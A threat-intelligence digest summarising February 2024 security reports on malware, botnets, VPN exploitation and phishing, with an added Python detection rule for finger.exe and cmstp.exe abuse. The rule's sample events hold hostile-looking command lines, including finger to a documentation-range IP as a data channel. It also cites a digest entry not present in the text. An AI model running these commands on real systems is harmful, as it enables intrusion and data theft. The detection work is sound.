- Proofpoint researchers have identified an active cloud account takeover campaign targeting Microsoft Azure environments. The attack, combining credential phishing and cloud account takeover tactics, has impacted various organizations globally. Threat actors utilize individualized phishing lures within shared documents, directing users to malicious webpages. Diverse roles, including senior executives, are targeted, with a specific Linux user-agent identified. Post-compromise activities involve MFA manipulation, data exfiltration, internal and external phishing, financial fraud attempts, and mailbox rule creation. The attackers’ operational infrastructure includes proxies, data hosting services, and hijacked domains, posing challenges for defenders. While no specific attribution is provided, Russian and Nigerian attackers are noted as potential actors. The Proofpoint team recommends enhanced security measures, including user training, multi-factor authentication, and continuous monitoring.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Glupteba_botnet_using_undocumented_UEFI_Bootkit_to_Avoid_Detection
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- Unit 42 has discovered that the Glupteba botnet uses a previously unreported Unified Extensible Firmware Interface (UEFI) bootkit, which gives the malware an extra degree of stealth and sophistication. By intercepting and controlling the operating system boot process, the bootkit lets Glupteba conceal itself and establish covert persistence that is very difficult to detect and remove.
Source:
https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/#post-132484-_ydqdbjg0dngh
—
- Intel Source:
- ASEC
- Intel Name:
- RAT_Distribution_Leveraging_Legitimate_Tools_for_Stealth
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have uncovered a complex cyberattack scheme employing legitimate software tools alongside malicious files to distribute Revenge RAT malware stealthily. Attackers cleverly execute a malicious setup.exe file under the guise of running legitimate tools such as smtp-validator and Email To Sms, making detection by users challenging. The malware establishes persistence by hiding its components and manipulating Windows registry for autorun, further downloading additional payloads from a C2 server disguised as a benign blog. This multi-stage attack involves evasion techniques, such as using the CMSTP method for bypassing antivirus detection and employing fileless execution of Revenge RAT, to perform various malicious activities including data theft.
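Two of the living-off-the-land patterns in this digest, finger.exe used as a data channel (Data_Leakage_via_Finger above) and cmstp.exe launching an attacker-supplied INF (the CMSTP bypass in this Revenge RAT chain), are both visible in process-creation telemetry. The rules below are an added example, not code from Huntress or ASEC: they evaluate Sysmon Event ID 1-style records (Image, CommandLine, ParentImage) and raise an alert for either pattern, with extra weight when the finger “user” is purely numeric or the INF sits in a user-writable directory. The events are constructed; 203.0.113.45 is a documentation-range address.

```python
"""
Process-creation rules for finger.exe abuse (T1105 / T1048) and the CMSTP
INF bypass (T1218.003).

Added example: not code from Huntress or ASEC. Event fields follow Sysmon
Event ID 1 naming (Image, CommandLine, ParentImage); all events are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str
    image: str
    command_line: str


# finger <identity>@<host>; host may be an IPv4 literal or a name
FINGER_TARGET = re.compile(r"(?P<user>[^\s@]+)@(?P<host>(?:\d{1,3}\.){3}\d{1,3}|[\w.-]+)")
# cmstp /ni (no icon) /s (silent), in either order: the documented LOLBin invocation
CMSTP_SILENT = re.compile(r"/ni\b.*/s\b|/s\b.*/ni\b", re.IGNORECASE)
# INF supplied from a location an ordinary user can write to
USER_WRITABLE = re.compile(r"\\(temp|appdata|programdata|users\\public|downloads)\\", re.IGNORECASE)


def evaluate(event: dict) -> list[Alert]:
    """Return the alerts raised by a single process-creation event."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    name = image.rsplit("\\", 1)[-1].lower()
    alerts = []

    if name == "finger.exe":
        m = FINGER_TARGET.search(cmd)
        if m:
            rule = "finger.exe used as a download/exfil channel"
            if m.group("user").isdigit():   # a numeric 'user' is not a real finger query
                rule += " (numeric identity)"
            alerts.append(Alert(rule, "T1105 / T1048", image, cmd))

    if name == "cmstp.exe" and CMSTP_SILENT.search(cmd) and ".inf" in cmd.lower():
        rule = "cmstp.exe /ni /s with attacker-supplied INF"
        if USER_WRITABLE.search(cmd):
            rule += " from a user-writable path"
        alerts.append(Alert(rule, "T1218.003", image, cmd))

    return alerts


def scan(events: list[dict]) -> list[Alert]:
    return [a for e in events for a in evaluate(e)]


# Constructed events.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\finger.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"finger.exe 3140327@203.0.113.45"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\setup.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\Public\setup.inf"},
    {"Image": r"C:\Windows\System32\cmstp.exe",            # no /ni: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmstp.exe /s C:\ProgramData\Corp\vpn.inf"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a.technique}] {a.rule}: {a.command_line}")
```

finger.exe has essentially no legitimate use on a modern Windows estate, so the first rule can alert on any invocation; the CMSTP rule is noisier because VPN profile installers also call it silently, hence the path qualifier and the parent process in the sample, which is what an analyst would pivot on next.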
—
- Intel Source:
- Zscaler
- Intel Name:
- PikaBot_Appears_Again_with_Simplified_Code_and_Clever_Strategies
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered that the threat actors responsible for the PikaBot malware have undergone a “devolution” in which they have made notable modifications to the virus. The developers have removed sophisticated obfuscation techniques and altered the network interactions, which has reduced the complexity of the code even though it looks to be in a new development cycle and testing phase.
Source:
https://www.zscaler.com/blogs/security-research/d-evolution-pikabot
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Warzone_RAT_Cybercriminals_caught
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- The article highlights an international operation that acquired domains involved in the sale of information-stealing malware. Federal authorities in Boston took control of www.warzone.ws and three associated domains, which were selling the sophisticated Warzone RAT malware. This Remote Access Trojan (RAT) allowed cybercriminals to access victims’ file systems, capture screenshots, record keystrokes, steal usernames and passwords, and even monitor victims through their web cameras, all without their awareness or consent.
Source:
https://www.malwarebytes.com/blog/news/2024/02/warzone-rat-infrastructure-seized
—
- Intel Source:
- Proofpoint
- Intel Name:
- Bumblebee_is_Back
- Date of Scan:
- 2024-02-13
- Impact:
- LOW
- Summary:
- On February 8, 2024, Proofpoint researchers discovered that the Bumblebee malware had reappeared in the cybercriminal threat landscape following a four-month hiatus. Cybercriminal threat actors employ the sophisticated downloader known as Bumblebee, which was a preferred payload from its initial release in March 2022 and continued to be used until October 2023, when it vanished.
Source:
https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black
—
- Intel Source:
- Orange Cyberdefense
- Intel Name:
- Attackers_Exploiting_Ivanti_SSRF_Flow_to_Deploy_DSLog_Backdoor
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- In order to install the new DSLog backdoor on susceptible devices, hackers are taking advantage of a server-side request forgery (SSRF) weakness in the Ivanti Connect Secure, Policy Secure, and ZTA gateways. On Ivanti gateways running versions 9.x and 22.x, the vulnerability affects the SAML component of the aforementioned products and enables attackers to bypass authentication and access restricted resources.
—
- Intel Source:
- Huntress
- Intel Name:
- MSSQL_Server_Compromise_and_Ransomware_Threat
- Date of Scan:
- 2024-02-13
- Impact:
- MEDIUM
- Summary:
- Huntress researchers have unveiled sophisticated tactics used by attackers targeting MSSQL servers, including the use of the bulk copy command for file extraction and the deployment of scripts for unauthorized account creation and remote access tool installation.
Source:
https://www.huntress.com/blog/attacking-mssql-servers
—
- Intel Source:
- SOCRadar
- Intel Name:
- LuaJIT_based_modular_backdoor_LuaDream_activity_by_Sandman_APT
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- SOCRadar wrote in their article that, according to research provided by SentinelOne and QGroup, the Sandman APT group employs highly sophisticated and stealthy attack methods, with a particular focus on a new modular backdoor known as LuaDream, which is built on the LuaJIT platform. LuaDream’s design is aimed at minimizing detection risks and shows a continuous development approach.
—
- Intel Source:
- SOCRadar
- Intel Name:
- A_new_Ivanti_critical_Remote_Code_Execution_vulnerability_in_FortiOS
- Date of Scan:
- 2024-02-12
- Impact:
- HIGH
- Summary:
- Fortinet has revealed a new critical Remote Code Execution vulnerability in FortiOS SSL VPN, cautioning about potential exploitation in ongoing attacks. Latest Ivanti Flaw Possibly Exploited (CVE-2024-21762, CVE-2023-40547, CVE-2024-22024).
—
- Intel Source:
- Habr
- Intel Name:
- Cyber_spies_Sticky_Werewolf_activity_in_Belarus
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- The cyber-espionage APT group Sticky Werewolf probably tried to attack Belarusian companies by distributing the Ozone RAT remote access Trojan under the guise of the computer cleaning and optimization software CCleaner.
Source:
https://habr.com/ru/companies/f_a_c_c_t/news/792672/
—
- Intel Source:
- Hunt.io
- Intel Name:
- Examination_of_new_ShadowPad_infrastructure_new_threat_actor
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- This post will examine ShadowPad infrastructure linked to a yet-to-be-identified threat actor. What makes this activity different is a slight change in the HTTP response headers and the use of a certificate attempting to spoof the American technology company Dell. Within this group of IPs, there are additional subsets of activity utilizing different port configurations and some interesting domains, discussed later in this article.
Source:
https://hunt.io/blog/tracking-shadowpad-infrastructure-via-non-standard-certificates
—
- Intel Source:
- Eclecticiq
- Intel Name:
- Increased_delivery_of_the_DarkGate_loader
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- EclecticIQ analysts observed increased delivery of the DarkGate loader following the takedown of Qakbot infrastructure last year. EclecticIQ analysts are confident that financially motivated threat actors, including groups like TA577 and Ducktail, along with Ransomware-as-a-Service (RaaS) organizations such as BianLian and Black Basta, primarily use DarkGate. These threat actors target financial institutions in Europe and the USA, focusing mainly on double extortion tactics.
Source:
https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_malicious_PowerShell_payload_Rabby_Wallet
- Date of Scan:
- 2024-02-12
- Impact:
- LOW
- Summary:
- In ISC.SANS researcher Xavier Mertens’ research, a YARA rule triggered on a new sample called “Rabby-Wallet.msix”; the file has a VT score of 8/58. After his analysis, the file appears to implement the same technique to execute a malicious PowerShell payload.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_HijackLoader_Expands_Its_Evasion_Techniques
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers at CrowdStrike have discovered that, as other threat actors use the loader malware known as HijackLoader more frequently to deliver more payloads and tooling, the threat actors behind it have developed new security evasion strategies.
Source:
https://www.crowdstrike.com/blog/hijackloader-expands-techniques/
—
- Intel Source:
- Esentire
- Intel Name:
- SolarMarker_infections
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses the increasing prevalence of SolarMarker infections and the evolving tactics of the threat actor behind it. The eSentire Threat Response Unit (TRU) has been tracking SolarMarker since 2021 and has observed a significant increase in infections since November 2023. The threat actor has been using Inno Setup and PS2EXE tools to generate payloads, with recent payloads being modified using string replacements. The article also includes details on the PowerShell script used by SolarMarker, the loading of second-stage payloads, and the addition of junk instructions and byte arrays to evade detection. The TRU team recommends implementing controls such as Endpoint Detection and Response (EDR) solutions and security awareness training to protect against SolarMarker. The article also provides indicators of compromise and decrypted payloads for reference.
Source:
https://www.esentire.com/blog/the-oncoming-wave-of-solarmarker
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_Zardoor_backdoor_used_in_the_cyber_espionage_operation
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses a new cyber espionage campaign, known as Zardoor, targeting an Islamic non-profit organization. The campaign uses a previously unreported malware family and advanced techniques to maintain access to the victim’s network without detection. The article provides details on the execution flow of the Zardoor backdoor and how the threat actor maintains persistence using a dropper and malicious DLL files. It also describes the use of reverse proxy tools to bypass network security measures and provides information on how to detect and block this threat. The article concludes with a list of MITRE ATT&CK techniques used by the threat actor and a list of IOCs for further investigation.
Source:
https://blog.talosintelligence.com/new-zardoor-backdoor/
—
- Intel Source:
- Bitdefender
- Intel Name:
- A_New_Rust_Written_MacOS_Backdoor_Ties_to_Windows_Ransomware
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers at Bitdefender have uncovered a brand-new backdoor that targets Mac OS users. This family of malware, which had not been previously described, is written in Rust and has a number of intriguing properties. All detected files are distributed directly as FAT binaries with Mach-O files for both x86_64 Intel and ARM architectures, and the backdoor appears to be posing as a Visual Studio update.
—
- Intel Source:
- Esentire
- Intel Name:
- The_injection_of_RemcosRAT_into_the_winhlp32_exe_file_process
- Date of Scan:
- 2024-02-09
- Impact:
- MEDIUM
- Summary:
- The article discusses a recent threat investigation conducted by eSentire’s Threat Response Unit (TRU). The investigation involved a suspicious ZIP archive containing an AnyDesk executable and a VBS file, delivered via a Discord CDN link. Further investigation revealed that the VBS file executed another VBS file hosted on paste[.]ee, which contained the DcRat malware. The DcRat malware had encrypted configuration and supported dynamic loading and execution of plugins. The final payload retrieved via the plugin was a VBS file containing the RemcosRAT malware and dynwrapx.dll. The RemcosRAT malware was injected into the winhlp32.exe process and allowed for remote control of the infected machine. The TRU team isolated the system and provided recommendations for protection against similar threats, such as user training and using Next-Gen AV or Endpoint Detection and Response tools. The section also includes indicators of compromise and references for further information.
Source:
https://www.esentire.com/blog/from-onlydcratfans-to-remcosrat
—
- Intel Source:
- ArcticWolf
- Intel Name:
- Exploitation_of_Confluence_Server_Vulnerability_CVE_2023_22527
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers from Arctic Wolf have seen proof of the C3RB3R ransomware and a number of other malicious payloads being used after the CVE-2023-22527 vulnerability was exploited. CVE-2023-22527 is being used by a number of threat actors to distribute payloads for trojans that gain remote access and mine cryptocurrencies.
—
- Intel Source:
- Fortinet
- Intel Name:
- Attacks_on_Critical_Infrastructure_Exploiting_FortiOS_Vulnerabilities
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- Researchers from Fortinet alerted companies on Wednesday that attacks targeting vital infrastructure and other sectors have been made possible by APTs associated with China and other nations, which have been exploiting two known FortiOS vulnerabilities.
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_malicious_use_of_maldocs
- Date of Scan:
- 2024-02-09
- Impact:
- LOW
- Summary:
- The article discusses the use of maldocs, or malicious documents, in spreading malware. It introduces the concept of maldocs and provides examples of different types of malware. The article also focuses on old and well-known CVEs used in Microsoft Word and Excel, and their continued threat to the cyber community. It discusses the techniques used by maldoc operators to evade detection and the challenges faced by researchers in analyzing them. The article concludes by emphasizing the need for different methods to deal with maldocs and providing resources for further reading.
Source:
https://research.checkpoint.com/2024/maldocs-of-word-and-excel-vigor-of-the-ages/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Raspberry_Robin_worm
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses the latest version of the malware Raspberry Robin and its evasion techniques, including NtTraceEvent hooking and new evasion tricks. It also explains the changes in the malware’s lateral movement logic and communication method. The article provides a comparison between the previous and current versions of the malware and describes its persistence method. It also discusses the ongoing threat of Raspberry Robin and how Check Point customers remain protected against it. The article includes a detailed analysis of the first stage of the malware and its use of APIs. It also provides a list of IOCs and onion domains associated with the malware.
Source:
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
—
- Intel Source:
- Avast
- Intel Name:
- Avast_Q4_2023_Threat_Report
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The Avast Q4/2023 Threat Report provides a comprehensive overview of the cyber threat landscape in the fourth quarter of 2023. It covers both desktop and mobile threats, highlighting the significant increase in blocked attacks and the resurgence of Qakbot. The report also discusses the use of Google OAuth API for malicious activities and the rise of malicious coinmining. It also covers the evolving mobile threat landscape, including the resurgence of the Chameleon banker and the spread of SpyLoans on the PlayStore. The report concludes with predictions for 2024 and emphasizes Avast’s commitment to ensuring the safety of its users. The methodology used in the report is also explained, including the calculation of the “risk ratio” to measure the severity of specific threats. The report also discusses the prevalence and impact of RATs, rootkits, and web-based threats on mobile devices. It also covers the growing trend of mobile scams and the use of cell phones for online presence management. The report also highlights the dangers of adware and the need for dynamic and adaptive measures to counter it. It also discusses the prevalence of financial and dating scams, as well as the increase in fake online shops and phishing scams targeting post-holiday online shoppers. The report also mentions the use of standard tools and vulnerabilities by rootkits and APT groups, as well as Avast’s efforts to address scam push notifications. It also discusses the distribution of malicious mods for popular messaging apps and the risk ratio for mobile spyware. The report also provides insights into the prevalence and impact of bots and coinminers, with a focus on specific threats and countries. Overall, the report highlights the constantly evolving and sophisticated nature of cyber threats and the need for increased cybersecurity measures to protect against them.
Source:
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/
—
- Intel Source:
- Citizenlab
- Intel Name:
- The_PAPERWALL_malicious_campaign
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses the PAPERWALL network, a large and fast-growing network of Chinese websites posing as local news outlets. It provides information on the number of websites targeting various countries and the high-confidence host IP addresses. The article also discusses the attribution of PAPERWALL to a Chinese PR firm and the evidence linking it to the websites. It also mentions the use of hypestat.com to measure website traffic and the negligible traffic for most PAPERWALL domains. The article highlights the network’s tactics, including the use of commercial press releases to disseminate pro-Beijing disinformation and ad hominem attacks. It also discusses the potential impact of these influence operations and the role of private firms in managing them. The article provides a breakdown of the types of content published on the PAPERWALL websites, including conspiracy theories, Chinese state media reposts, and scraping of local mainstream media. It also discusses the infrastructure and hosting of these websites, as well as the small number of content author names used. The article concludes by listing the confirmed domains and targeted countries, as well as acknowledging the research support and peer review from various individuals and organizations.
—
- Intel Source:
- S2W Blog
- Intel Name:
- The_Golang_Stealer_Troll_and_GoBear_Backdoor
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- S2W threat researchers have discovered a new malware sample associated with the Kimsuky group, named Troll Stealer. It is distributed through a Dropper disguised as SGA Solutions’ Trusted PKI installer. Troll Stealer is capable of stealing the GPKI folder on infected systems, indicating a potential focus on devices within administrative and public organizations in South Korea. Furthermore, the identification of additional malware signed with the same legitimate certificate raises the possibility of future distributions using that certificate.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Malicious_Python_Scripts_Targeting_Windows_Users
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- Researchers at ISC.SANS have identified a threat where malicious Python scripts are employed by threat actors to target Windows users, incorporating a keylogger. The recorded keystrokes are transmitted to a basic TCP connection established with the command and control server (C2), lacking any form of encryption, essentially sending raw keycodes.
—
- Intel Source:
- Cyble
- Intel Name:
- The_analysis_of_a_new_Clipper_dubbed_XPhase
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses a new malware campaign, known as the “Doppelganger Dilemma,” which targets cryptocurrency users through deceptive websites and mimicking legitimate crypto applications. The campaign primarily targets Indian users but also has phishing sites tailored to Russian users. The malware, named “XPhase Clipper,” intercepts and modifies cryptocurrency wallet addresses copied by users. The campaign is linked to a previous phishing campaign and is believed to be carried out by the same threat actor. The article also highlights the use of a deceptive YouTube channel and provides technical analysis of the campaign. The abstract introduces the concept of adaptability and resourcefulness in sustaining cyber attacks, and the article concludes with recommendations for cybersecurity best practices and indicators of compromise for detecting the XPhase Clipper malware.
—
- Intel Source:
- Lumen
- Intel Name:
- Its_Not_A_Comeback_of_KV_Botnet
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- According to Black Lotus Labs, since users are unlikely to notice an impact or possess the required monitoring forensic tools to detect an infection, KV-botnet attackers will likely continue to use medium- to high-bandwidth devices as a springboard in the geographic areas of their targets. Additionally, the Federal Bureau of Investigation (FBI) carried out a court-authorized takedown of the KV-botnet in early December 2023, according to a press release from the Department of Justice (DOJ).
—
- Intel Source:
- Securelist
- Intel Name:
- Abuse_of_Squirrel_Installation_by_Multi_Stage_Banking_Trojan
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- Securelist researchers have discovered a new malware that is targeting consumers of over 60 banking institutions, primarily in Brazil. Using a variety of cutting-edge technologies, it differs from well-known banking Trojan attacks.
Source:
https://securelist.com/coyote-multi-stage-banking-trojan/111846/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- A_malvertising_campaign_on_Facebook_still_on
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- The article discusses a Facebook scam that has been ongoing for almost a year and is now appearing in different languages. The scam involves fake posts about fatal accidents and prompts users to click on a link, leading to malicious websites. The scammers use different tactics to target users based on their location and device. Tips on how to protect oneself from falling victim to this scam are provided, such as checking for unknown apps and enabling two-factor authentication. Malwarebytes’ efforts to block these malicious websites are also mentioned, along with their Identity Theft Protection service as a way to safeguard personal information.
Source:
https://www.malwarebytes.com/blog/news/2024/02/facebook-fatal-accident-scam-still-rages-on
—
- Intel Source:
- ASEC
- Intel Name:
- BlueShell_Targeting_Linux_Systems_in_Korean_Attacks
- Date of Scan:
- 2024-02-08
- Impact:
- LOW
- Summary:
- ASEC researchers have identified ongoing attacks on Korean Linux systems, where the BlueShell backdoor malware, upon installation, grants the threat actor full control over the compromised system.
—
- Intel Source:
- ASEC
- Intel Name:
- The_Distribution_of_Zephyr_CoinMiner
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The ASEC BLOG has discovered a CoinMiner targeting Zephyr cryptocurrency, distributed through a compressed file named “WINDOWS_PY_M3U_EXPLOIT_2024.7z.” The file creates scripts and executables, including an NSIS installer and two Javascript files, executed via wscript.exe. The executable “x.exe” contains a compressed file and a legitimate “7za.exe” file, which, when decompressed with a specific password, creates two more Autoit script files acting as a CoinMiner. Users are advised to be cautious when downloading files from unknown sources and to update their anti-malware solutions. The malware is detected by V3 and IOC information is provided for further investigation.
—
- Intel Source:
- Vice
- Intel Name:
- The_fake_version_of_WhatsApp_linked_to_a_spyware
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- Researchers have discovered a fake version of WhatsApp created by a spyware vendor, Cy4Gate, to gather information from iPhone users. The fake app was designed to trick users into installing a configuration file that could potentially collect data from their device. The company has a history of developing surveillance products and the fake WhatsApp page shared an encryption certificate with other domains associated with Cy4Gate. Although the company denied involvement, the researchers believe it is likely their product. The article also discusses Cy4Gate’s Epeius product, which is designed for targeted surveillance and data collection.
—
- Intel Source:
- CISA
- Intel Name:
- The_compromise_of_the_IT_environments_of_multiple_critical_infrastructures_by_Volt_Typhoon
- Date of Scan:
- 2024-02-07
- Impact:
- HIGH
- Summary:
- CISA, NSA, and the FBI released a joint Cybersecurity Advisory about People’s Republic of China (PRC) state-sponsored cyber actors who are seeking to disrupt IT networks with cyberattacks against U.S. critical infrastructure in the event of a major crisis or conflict with the United States. It was based on observations from the U.S. authoring agencies’ incident response activities at critical infrastructure organizations compromised by the PRC state-sponsored cyber group known as Volt Typhoon (also known as Vanguard Panda, BRONZE SILHOUETTE, Dev-0391, UNC3236, Voltzite, and Insidious Taurus). The U.S. authoring agencies have confirmed that Volt Typhoon has compromised the IT environments of multiple critical infrastructure organizations—primarily in the Communications, Energy, Transportation Systems, and Water and Wastewater Systems Sectors—in the continental and non-continental United States and its territories, including Guam.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories?f%5B0%5D=advisory_type%3A65&f%5B1%5D=advisory_type%3A93&f%5B2%5D=advisory_type%3A94
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
https://www.cisa.gov/news-events/analysis-reports/ar24-038a
—
- Intel Source:
- F1tym1
- Intel Name:
- The_distribution_of_Qshing_Emails
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses the distribution of Qshing emails, which are disguised as payslips and lead to malicious apps or phishing sites when a QR code is scanned. The sender email address is forged to appear legitimate, but the actual address can be seen in the email header. Scanning the QR code redirects users to a phishing site that prompts for personal information and can result in financial losses. The article provides IOC information and encourages users to subscribe to AhnLab’s threat intelligence platform for more information.
Source:
https://f1tym1.com/2024/02/02/distribution-of-qshing-emails-disguised-as-payslips/
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_phishing_campaign_disguised_as_a_famous_Korean_portal_login_page
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses a recent phishing case where a fake login page was disguised as a popular Korean portal website. The threat actor collected login credentials and client information through the phishing page and used a legitimate plugin-type service to obtain more data. The article provides IOC information and advises caution when using login pages linked to emails from unknown sources.
—
- Intel Source:
- Rapid7
- Intel Name:
- A_Comprehensive_Analysis_of_Black_Hunt_Ransomware
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article provides a comprehensive analysis of the Black Hunt ransomware, a new variant that was first reported in 2022. The article discusses the ransomware’s features and capabilities, including its ability to encrypt various file extensions and evade detection by checking for debugging and targeting specific countries. It also explores the ransomware’s code and functionality, including its encryption process, spreading mechanisms, and use of MITRE ATT&CK techniques. The article also provides an overview of the ransomware’s malicious activities, such as modifying the Windows registry, disabling security measures, and inhibiting system recovery. It concludes with a list of indicators of compromise and a technical analysis of the ransomware’s code.
—
- Intel Source:
- Splunk
- Intel Name:
- Jenkins_CVE_2024_23897_RCE
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- This article discusses the recent discovery of a critical security vulnerability in Jenkins servers, which are commonly used for continuous integration and deployment in software development. The vulnerability, known as CVE-2024-23897, allows attackers to read files from the server’s file system without authentication. The Splunk Threat Research Team has developed security analytics and hunting queries to help defenders protect against this exploit. The article provides an overview of the exploit and how it works, as well as a sample query for detecting it in Jenkins logs. It also discusses the use of a reverse proxy and logging Jenkins logs in Splunk for enhanced security. The author, Michael Haag, is also mentioned, along with references for further information.
Source:
https://www.splunk.com/en_us/blog/security/security-insights-jenkins-cve-2024-23897-rce.html
—
- Intel Source:
- Infoblox
- Intel Name:
- Lazarus_KandyKorn_malicious_DNS
- Date of Scan:
- 2024-02-07
- Impact:
- LOW
- Summary:
- The article discusses the importance of early detection of malicious domains in preventing cyber attacks. It introduces Infoblox’s DNS Early Detection Program, which uses proprietary techniques to identify potentially malicious domains and compares its analysis with data from public open source intelligence and commercial threat intelligence feeds. The program’s findings and role in identifying suspicious domains are highlighted, along with an analysis of a phishing campaign by CSIRT KNF. The methodology used in the analysis and the advantages of using Infoblox’s suspicious domain data are also discussed. The article is written by a senior product marketing manager at Infoblox with experience in cybersecurity.
—
- Intel Source:
- MP.WEIXIN.QQ
- Intel Name:
- Kimsuky_APT_Evolving_Tactics_targeted_Cyber_Espionage_Campaign
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Kimsuky APT, known for targeting South Korean military, expands cyber espionage to government entities. Recent tactics involve deceptive LNK files, with a focus on the financial sector. The group employs advanced techniques, including cloud services for communication, indicating an evolving threat landscape. Cybersecurity vigilance is crucial in countering Kimsuky’s sophisticated and fileless attacks.
—
- Intel Source:
- Cybereason
- Intel Name:
- The_Second_Round_of_Ivanti_Connect_Secure_VPN_ZeroDay_Exploitation
- Date of Scan:
- 2024-02-06
- Impact:
- HIGH
- Summary:
- Researchers from Cybereason have looked into instances in which recently discovered zero-day vulnerabilities in Ivanti VPN appliances were exploited. These vulnerabilities were not patched at the time of disclosure. On January 10, 2024, Ivanti urged users to implement quick mitigations for two significant vulnerabilities impacting their Connect Secure and Policy Secure systems, identified as CVE-2023-46805 and CVE-2024-21887. A third party published a Proof of Concept (PoC) on January 16, 2024, which led to an increase in the scope of exploitation. In addition to the existing threat, Ivanti disclosed two additional vulnerabilities on January 31st: CVE-2024-21888, which is a privilege escalation flaw, and CVE-2024-21893, which is an SSRF web vulnerability. These vulnerabilities increase the need for action and heightened security awareness while the manufacturer continues to work on developing and delivering suitable mitigations.
Source:
https://www.cybereason.com/blog/threat-alert-ivanti-connect-secure-vpn-zero-day-exploitation
—
- Intel Source:
- SeeBug
- Intel Name:
- New_Trojan_Tools_Used_by_APT_K_47_Group
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from SeeBug have discovered that the APT-K-47 group used an undisclosed Trojan tool. Following a successful intrusion, the tool downloads additional malicious payloads and ORPCBackdoor, traverses disk directories to steal target files, and then sends the data back to the command and control server (C2). Simultaneously, the group transmitted the password information back after stealing it from the target computer’s browser.
Source:
https://paper.seebug.org/3115/
—
- Intel Source:
- GROUP-IB
- Intel Name:
- APAC_Job_Seekers_Data_Compromised_In_Massive_Breach
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- GROUP-IB researchers have discovered that ResumeLooters successfully targeted a minimum of 65 websites in 2023, using straightforward techniques such as SQL injection and XSS. The threat actor sought to insert XSS scripts into all accessible forms, with the intention of executing them on administrators’ devices to acquire admin credentials.
—
- Intel Source:
- QiAnXin X Laboratory
- Intel Name:
- C2_Hosting_Using_EtherHiding_by_SmartGaft
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
- Researchers from XLab have obtained Smargaft bot samples for two different versions of each of the three CPU architectures: ARM, MIPS, and X86/64. The ability of these versions to spread like worms is the main distinction between them. In general, Smargaft functions quite simply. It verifies the current user when it runs on a compromised device; if it’s root, it starts additional scanning and propagation tasks. After that, it manipulates the watchdog to stop the device from restarting and binds to a local port to guarantee that only one instance is running at a time. It then initiates five actions, including using smart contracts to obtain C2, launching DDoS attacks, and making sure it stays on the device. Lastly, Smargaft cycles through these duties at predetermined intervals while operating in an endless loop.
Source:
https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/
—
- Intel Source:
- CSIRT-CTI
- Intel Name:
- Stately_Taurus_Cyber_Espionage_in_Myanmar
- Date of Scan:
- 2024-02-06
- Impact:
- LOW
- Summary:
